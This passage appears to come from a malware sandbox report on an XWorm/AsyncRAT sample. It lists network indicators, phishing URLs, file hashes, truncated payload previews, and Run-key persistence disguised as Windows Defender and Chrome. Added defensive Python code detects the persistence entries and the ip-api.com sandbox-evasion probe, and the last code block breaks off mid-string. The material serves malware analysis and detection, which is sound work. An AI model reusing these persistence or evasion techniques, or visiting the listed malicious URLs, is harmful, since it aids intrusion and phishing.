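    RegSetEvent("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                "Windows Defender",
                "C:\\Users\\user\\AppData\\Local\\Temp\\Windows Defender.exe"),
    RegSetEvent("HKCU64\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                "Google Chrome",
                "C:\\Users\\user\\AppData\\Local\\Temp\\Google Chrome.exe"),
    RegSetEvent("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                "SecurityHealth",
                "C:\\Windows\\system32\\SecurityHealthSystray.exe"),
    RegSetEvent("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                "Google Chrome",
                '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --no-startup-window'),
]

if __name__ == "__main__":
    for event, reasons in scan(EVENTS):
        print(event.key_path, event.value_name, "->", "; ".join(reasons))
```

Both report events fire on two counts (Temp-folder target plus a product name that does not resolve to the product's install path); the quoted Chrome entry under Program Files is left alone, which is why the value is parsed for its executable before the path checks run.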
Match: 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
Windows Defender.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
scan_88845i.scr.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Cotizaci#U00f3n P13000996 pdf.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
x2Yi9Hr77a.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
z71htmivzKAUpOkr2J.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
scan_374783.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
RFQ 002593810024350.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
Request For Quotation.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
PixpFUv4G7.exe | malicious | Quasar, XWorm | ip-api.com/line/?fields=hosting
Match: ip-api.com
Associated Sample Name / URL | Detection | Threat Name | Context
Windows Defender.exe | malicious | XWorm | 208.95.112.1
scan_88845i.scr.exe | malicious | AgentTesla | 208.95.112.1
Cotizaci#U00f3n P13000996 pdf.exe | malicious | AgentTesla | 208.95.112.1
x2Yi9Hr77a.exe | malicious | XWorm | 208.95.112.1
z71htmivzKAUpOkr2J.exe | malicious | AgentTesla | 208.95.112.1
scan_374783.js | malicious | AgentTesla | 208.95.112.1
RFQ 002593810024350.bat.exe | malicious | AgentTesla | 208.95.112.1
DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | 208.95.112.1
http://tcaconnect.ac-page.com/toronto-construction-association-inc/ | malicious | Unknown | 51.77.64.70
Request For Quotation.js | malicious | AgentTesla | 208.95.112.1

Match: s-part-0017.t-0009.fb-t-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
WiTqtf1aiE.exe | malicious | LummaC, Vidar | 13.107.253.45
5rVhexjLCx.exe | malicious | Stealc | 13.107.253.45
https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04 | malicious | Unknown | 13.107.253.45
original.eml | malicious | Tycoon2FA | 13.107.253.45
https://emmaway-my.sharepoint.com/:f:/g/personal/jessica_emmaway_uk/Eodal0AmsKFKtMeEeNJG0V0B3d0_hcKMrsOYen-8p5FxhQ?e=bBSdNW | malicious | Unknown | 13.107.253.45
http://www.twbcompany.com | malicious | Unknown | 13.107.253.45
#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe | malicious | Snake Keylogger | 13.107.253.45
https://pub-2fd40031391d4470a8c3c1090493deca.r2.dev/index.html | malicious | HTMLPhisher | 13.107.253.45
http://patjimmy323.wixsite.com/my-site-1/ | malicious | HTMLPhisher | 13.107.253.45
http://hiotdakia.wixsite.com/p-a-y-h-2-o/blank/ | malicious | Unknown | 13.107.253.45
Match: TUT-ASUS
Associated Sample Name / URL | Detection | Threat Name | Context
Windows Defender.exe | malicious | XWorm | 208.95.112.1
scan_88845i.scr.exe | malicious | AgentTesla | 208.95.112.1
Cotizaci#U00f3n P13000996 pdf.exe | malicious | AgentTesla | 208.95.112.1
x2Yi9Hr77a.exe | malicious | XWorm | 208.95.112.1
z71htmivzKAUpOkr2J.exe | malicious | AgentTesla | 208.95.112.1
scan_374783.js | malicious | AgentTesla | 208.95.112.1
RFQ 002593810024350.bat.exe | malicious | AgentTesla | 208.95.112.1
DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | 208.95.112.1
Request For Quotation.js | malicious | AgentTesla | 208.95.112.1
PixpFUv4G7.exe | malicious | Quasar, XWorm | 208.95.112.1
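The context shared by every sample above is the same request, ip-api.com/line/?fields=hosting, which is how this family decides whether it is running in a data centre (the "Check if machine is in data center or colocation facility" signature). The following is an added example, not Joe Sandbox's code and not the sample's: it recognises that probe in a URL regardless of the response format ip-api.com is asked for, interprets the plain-text reply, and runs the check over constructed proxy log lines. It assumes the /line/ endpoint answers with a single "true" or "false" line; the tab-separated log format and its lines are constructed, not real traffic.

```python
"""Recognise the ip-api.com 'hosting' probe and flag it in proxy logs.

Added example, not Joe Sandbox's or the sample's code. Assumptions: the
plain-text /line/ reply is one "true"/"false" line, and the tab-separated
log lines below are constructed for this demonstration.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

PROBE_HOST = "ip-api.com"


def is_hosting_probe(url: str) -> bool:
    """True for ip-api.com requests whose 'fields' list includes 'hosting'.

    The host and the requested field are what matter; /line/, /json/ and the
    other output formats are all accepted so a format change does not evade
    the rule.
    """
    parts = urlsplit(url)
    if parts.hostname != PROBE_HOST:
        return False
    wanted = parse_qs(parts.query).get("fields", [])
    return any("hosting" in value.split(",") for value in wanted)


def parse_hosting_response(body: str):
    """Interpret the probe's reply: True = hosting/data centre, False = not.

    Anything else returns None so a caller never mistakes an error page or a
    rate-limit message for "not a sandbox".
    """
    text = body.strip().lower()
    if text == "true":
        return True
    if text == "false":
        return False
    return None


@dataclass(frozen=True)
class ProxyHit:
    timestamp: str
    process: str
    url: str


def parse_log_line(line: str):
    """timestamp<TAB>process<TAB>method<TAB>url<TAB>status (constructed format).

    Tabs rather than spaces, because process names such as
    'Windows Defender.exe' contain spaces.
    """
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 5:
        return None
    timestamp, process, _method, url, _status = fields
    return ProxyHit(timestamp, process, url)


def detect_probes(lines) -> list:
    """Return every log record whose URL is the hosting probe."""
    hits = []
    for line in lines:
        record = parse_log_line(line)
        if record is not None and is_hosting_probe(record.url):
            hits.append(record)
    return hits


# Constructed log lines; the first and third mirror the report's context.
LOG_LINES = [
    "2024-10-08T14:02:05\tX.exe\tGET\thttp://ip-api.com/line/?fields=hosting\t200",
    "2024-10-08T14:02:09\tchrome.exe\tGET\thttps://www.google.com/\t200",
    "2024-10-08T14:02:40\tWindows Defender.exe\tGET\thttp://ip-api.com/line/?fields=hosting\t200",
    "2024-10-08T14:02:50\tpowershell.exe\tGET\thttp://ip-api.com/json/\t200",
    "2024-10-08T14:02:55\tupdater.exe\tGET\thttp://ip-api.com/json/?fields=country,hosting\t200",
    "garbage line",
]

if __name__ == "__main__":
    for hit in detect_probes(LOG_LINES):
        print(hit.timestamp, hit.process, hit.url)
```

Matching on the host plus the requested field, rather than on the exact string from the report, keeps the rule stable across the line/json/xml/csv variants of the same lookup; the plain geolocation request without fields=hosting is deliberately not flagged.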
                                                No context
Match: C:\Users\user\AppData\Local\Temp\Windows Defender.exe
Associated Sample Name / URL | Detection | Threat Name
Windows Defender.exe | malicious | XWorm
                                                  Process:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
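The three records above are byte-identical (same size, entropy and every hash) yet carry different "Malicious" values: false when dropped by Google Chrome.exe and Windows Defender.exe, true when dropped by X.exe. The flag therefore follows the dropping process, not the file content, which matters when these records are turned into blocklists. The following is an added example, not Joe Sandbox's code: it parses the report's Key:Value records, groups them by SHA-256, reports hashes that were judged both ways, and recomputes the 8-bit entropy the "Entropy (8bit)" field reports so an analyst can verify it on their own copy of a file. REPORT_EXCERPT is a shortened copy of the records above (Preview and the hashes other than SHA-256 omitted); the entropy formula is the standard one, and no "Encrypted" threshold is assumed.

```python
"""Parse dropped-file records, find identical files with conflicting
verdicts, and recompute 8-bit Shannon entropy.

Added example, not Joe Sandbox's code. REPORT_EXCERPT is a shortened copy
of the report's records (Preview and non-SHA-256 hashes omitted).
"""
import math
from collections import Counter, defaultdict

REPORT_EXCERPT = """\
Process:C:\\Users\\user\\AppData\\Local\\Temp\\Google Chrome.exe
File Type:CSV text
Category:dropped
Size (bytes):654
Entropy (8bit):5.380476433908377
SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
Malicious:false
Process:C:\\Users\\user\\AppData\\Local\\Temp\\Windows Defender.exe
File Type:CSV text
Category:dropped
Size (bytes):654
Entropy (8bit):5.380476433908377
SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
Malicious:false
Process:C:\\Users\\user\\Desktop\\X.exe
File Type:CSV text
Category:dropped
Size (bytes):654
Entropy (8bit):5.380476433908377
SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
Malicious:true
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
Malicious:false
"""


def parse_records(text: str) -> list:
    """Turn 'Key:Value' lines into one dict per record.

    A 'Process:' line opens a new record; the split is on the first colon
    only, so Windows paths in the value survive intact.
    """
    records = []
    for line in text.splitlines():
        if not line.strip() or ":" not in line:
            continue
        key, value = line.split(":", 1)
        key, value = key.strip(), value.strip()
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def group_by_sha256(records) -> dict:
    """SHA-256 (upper-cased) -> list of records sharing that content."""
    groups = defaultdict(list)
    for record in records:
        if "SHA-256" in record:
            groups[record["SHA-256"].upper()].append(record)
    return dict(groups)


def conflicting_verdicts(records) -> dict:
    """SHA-256 -> set of 'Malicious' values, for content judged both ways."""
    conflicts = {}
    for sha, group in group_by_sha256(records).items():
        verdicts = {r.get("Malicious", "").lower() for r in group}
        if len(verdicts) > 1:
            conflicts[sha] = verdicts
    return conflicts


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    groups = group_by_sha256(recs)
    for sha, verdicts in conflicting_verdicts(recs).items():
        droppers = [r["Process"] for r in groups[sha]]
        print(sha, "judged", sorted(verdicts), "by", droppers)
```

Deduplicating on SHA-256 before reading the verdict is the practical consequence: one hash, one decision, with the dropping process recorded as context rather than as the deciding factor.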
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):178176
                                                  Entropy (8bit):6.164094369981057
                                                  Encrypted:false
                                                  SSDEEP:3072:B0wUOcJbg09AOawiPz4NpVq8BxFRzaqF+o2GQJ7/JzqVfGvf:C1bqzgVqwlL
                                                  MD5:D30B86E01EF85AA5FCF4292CB295F00F
                                                  SHA1:3EDB6178C1BB864088E68731032D011CD4C81BE2
                                                  SHA-256:92B901C9F8FDA1FB17CA7647DD16825C29FF4FDA2B6C4B15534426F95920BA6C
                                                  SHA-512:B7765C81111B717667335E8A2349C58EFDB3C7A8F376EB07FF27E2DEC29DB2529CD8353EBFC9F09AE88336243EAEA30EAC0A2FD22E66E8F27AEB9FB9F06CC2EF
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.f............................N.... ... ....@.. ....................... ............@.....................................W.... ..r............................................................................ ............... ..H............text...T.... ...................... ..`.rsrc...r.... ......................@..@.reloc..............................@..B................0.......H........c..H.......&.....................................................(....*.r...p*. .(T.*..(....*.r#..p*. *p{.*.s.........s.........s.........s.........*.rE..p*. %kU.*.rg..p*. ....*.r...p*. X...*.r...p*. ~.H.*.r...p*. E/..*..((...*.r...p*.r...p*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r9..p*.r[..p*. ..L.*.r}..p*. ....*.r...p*. ..'.*.r...p*. S...*.r...p*. ....*.r...p*.r'..p*. d...*.rI.
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):13655
                                                  Entropy (8bit):5.088566979859528
                                                  Encrypted:false
                                                  SSDEEP:96:TDbN390UNQ8Io+PqiQ8Io+PAdaQ8Io+P6XFQ8Io+PFZOTG3fM0C7Io+CyQ8Io+PC:zfNQoiQ+aQSQLZPQXZJ0QXZ9QXZJh
                                                  MD5:CF2C57C607142D3400E4DC4DAEE81B3B
                                                  SHA1:7E05DF36B33CA5B6E4B4BA6420A5D57D3852F102
                                                  SHA-256:EB3072547DF8FDC1E5E5949713ACA0C813A2AF363C5570032F3C431BFDCD55C6
                                                  SHA-512:D4DEB09CF96E17036878707D595AF553708BB93CDB630B48E2101907572F4D48DEBF718CA32A90BCF40F761AB577CD51AD11A3D243A985A344621A6BAEBD33B9
                                                  Malicious:false
                                                  Preview:::[Bat To Exe Converter]..::..::YAwzoRdxOk+EWAnk..::fBw5plQjdG8=..::YAwzuBVtJxjWCl3EqQJgSA==..::ZR4luwNxJguZRRnk..::Yhs/ulQjdF+5..::cxAkpRVqdFKZSzk=..::cBs/ulQjdF65..::ZR41oxFsdFKZSDk=..::eBoioBt6dFKZSTk=..::cRo6pxp7LAbNWATEpCI=..::egkzugNsPRvcWATEpCI=..::dAsiuh18IRvcCxnZtBJQ..::cRYluBh/LU+EWAnk..::YxY4rhs+aU+JeA==..::cxY6rQJ7JhzQF1fEqQJQ..::ZQ05rAF9IBncCkqN+0xwdVs0..::ZQ05rAF9IAHYFVzEqQJQ..::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=..::fBEirQZwNQPfEVWB+kM9LVsJDGQ=..::cRolqwZ3JBvQF1fEqQJQ..::dhA7uBVwLU+EWDk=..::YQ03rBFzNR3SWATElA==..::dhAmsQZ3MwfNWATElA==..::ZQ0/vhVqMQ3MEVWAtB9wSA==..::Zg8zqx1/OA3MEVWAtB9wSA==..::dhA7pRFwIByZRRnk..::Zh4grVQjdCyDJGyX8VAjFKq6/eQy7FeeCaIS5Of66/m7rFgPXelxfZfeug==..::YB416Ek+ZG8=..::..::..::978f952a14a936cc963da21a135fa983..@ECHO OFF..chcp 65001<nul..title ...... .. ....... [Nurik]..:A..cls..echo...echo. /$$ /$$ /$$ /$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$$ /$$$$$$ /$$ /$$..echo. . $$$ . $$. $$ . $$. $$__ $$ /$$__ $$. $$
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):87552
                                                  Entropy (8bit):5.981787823477636
                                                  Encrypted:false
                                                  SSDEEP:1536:+RWb0LuvJ1F1ZhZYJAlMK9iQbRcd44gQp3vACo6ecOPoXaPJ:680Lihu+MmiQbRcd7/L4cOPoXwJ
                                                  MD5:E9FF85404CBD9C9DF15E13D0E4B960B1
                                                  SHA1:3269C423EBC616270BF713010B3C87976D07D06A
                                                  SHA-256:576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
                                                  SHA-512:7468AEB3D286C7D47DB80221C13B8A22D886566611E4A0C4F924E9B7CCA3B9E95C0F1FAAA071ABA2A60E9E4EB1022C6650ACB4D3A0547293910010A502393098
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                  Joe Sandbox View:
                                                  • Filename: Windows Defender.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AN.f.................&...........E... ...`....@.. ....................................@..................................D..O....`..B+........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc...B+...`...,...(..............@..@.reloc...............T..............@..B.................D......H........c..........&.....................................................(....*.r...p*. *p{.*..(....*.r...p*. .O..*.s.........s.........s.........s.........*.rc..p*. ...*.r...p*. .%..*.r...p*. X...*.rL..p*. .g..*.r...p*. ..e.*..((...*.r...p*. .(T.*.r+..p*. ..<.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*.r...p*. .5..*.r$..p*. G...*.r...p*. ~.H.*.rj..p*. .L..*.r...p*. .x!.*.r...p*. .^
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
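Two kinds of record sit side by side in this listing and are easy to conflate when skimming: the dropped payload (a .NET PE that the sample writes to the user's Temp folder as Windows Defender.exe, hit by the XWorm and AsyncRAT Yara rules and flagged Malicious:true) and the 60-byte "PowerShell test file to determine AppLocker lockdown mode", which is the `__PSScriptPolicyTest_*.ps1` probe powershell.exe itself creates at every start. The probe is benign noise; the only information it carries is how many times PowerShell was launched during the run. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses records in the flat Key:Value form shown here, deduplicates them by SHA-256, counts the PowerShell probes as an estimate of PowerShell launches, and flags a PE dropped into a user-writable Temp path under a name borrowed from a trusted component. The sample records are constructed from fields visible on this page; the `TRUSTED_LOOKALIKES` list is an assumption of the example, not something the report states.

```python
"""Triage the dropped-file records of a Joe Sandbox listing (added example, not Joe
Security's code): flat "Key:Value" lines; "Yara Hits"/"Antivirus" continue on "•" lines."""
import re
from collections import Counter

LIST_FIELDS = {"Yara Hits", "Antivirus"}
# Written by powershell.exe at every start to probe AppLocker; benign, one copy per launch.
PS_POLICY_PROBE = "# PowerShell test file to determine AppLocker lockdown mode"
# Assumption (not from the report): names a payload borrows to pass as a trusted component.
TRUSTED_LOOKALIKES = ("windows defender", "microsoft", "svchost", "explorer")
USER_TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def parse_records(text: str) -> list[dict]:
    """Split the listing into records; each record begins with 'Process:'."""
    records: list[dict] = []
    list_key = None
    for line in filter(None, (ln.strip() for ln in text.splitlines())):
        if line.startswith("•"):                  # continuation of a list field
            if records and list_key:
                records[-1].setdefault(list_key, []).append(line.lstrip("•").strip())
            continue
        key, sep, value = line.partition(":")     # only the first colon splits
        if not sep:
            continue
        if key == "Process":
            records.append({})
        if not records:
            continue
        if key in LIST_FIELDS:
            list_key = key
            records[-1].setdefault(key, [])
        else:
            list_key = None
            records[-1][key] = value.strip()
    return records


def yara_field(rec: dict, name: str) -> list[str]:
    """One 'Name: value' component of every Yara hit, deduplicated, in order."""
    hits = (re.search(rf"{name}:\s*(.+?)(?:,\s*[A-Z][a-z]+:|$)", h)
            for h in rec.get("Yara Hits", []))
    return list(dict.fromkeys(m.group(1).strip() for m in hits if m))


def is_ps_policy_probe(rec: dict) -> bool:
    return (rec.get("Process", "").lower().endswith("powershell.exe")
            and rec.get("Preview", "").startswith(PS_POLICY_PROBE))


def flag(rec: dict) -> list[str]:
    """Reasons a record deserves attention; an empty list means nothing notable."""
    reasons = []
    if rec.get("Malicious", "").lower() == "true":
        reasons.append("report marks file malicious")
    if rec.get("File Type", "").startswith("PE32"):
        for src in yara_field(rec, "Source"):      # on-disk path of the drop
            if USER_TEMP_RE.search(src):
                reasons.append(f"PE written to user Temp: {src}")
                name = src.rsplit("\\", 1)[-1].lower()
                if any(t in name for t in TRUSTED_LOOKALIKES):
                    reasons.append(f"name imitates a trusted component: {name}")
    return reasons


def triage(text: str) -> dict:
    """Deduplicate by SHA-256, count PowerShell probes, flag notable files."""
    records = parse_records(text)
    hashes = [r.get("SHA-256", "").upper() for r in records]
    unique: dict[str, dict] = {}
    for h, r in zip(hashes, records):
        unique.setdefault(h, r)               # keep the first record per hash
    return {
        "records": len(records),
        "unique_files": len(unique),
        "duplicates_by_sha256": {h: n for h, n in Counter(hashes).items() if n > 1},
        "powershell_policy_probes": sum(map(is_ps_policy_probe, records)),
        "flagged": {h: flag(r) for h, r in unique.items()
                    if not is_ps_policy_probe(r) and flag(r)},
    }


# Constructed sample input: the XWorm payload record once and the PowerShell probe
# record three times (the report repeats it once per powershell.exe launch).
PE_RECORD = r"""
Process:C:\Users\user\Desktop\X.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
SHA-256:576D63BF309D5FB80B9D2683B21B8257D60DD2A8FA4974982D38EBFACE89FC47
Malicious:true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, Author: Joe Security
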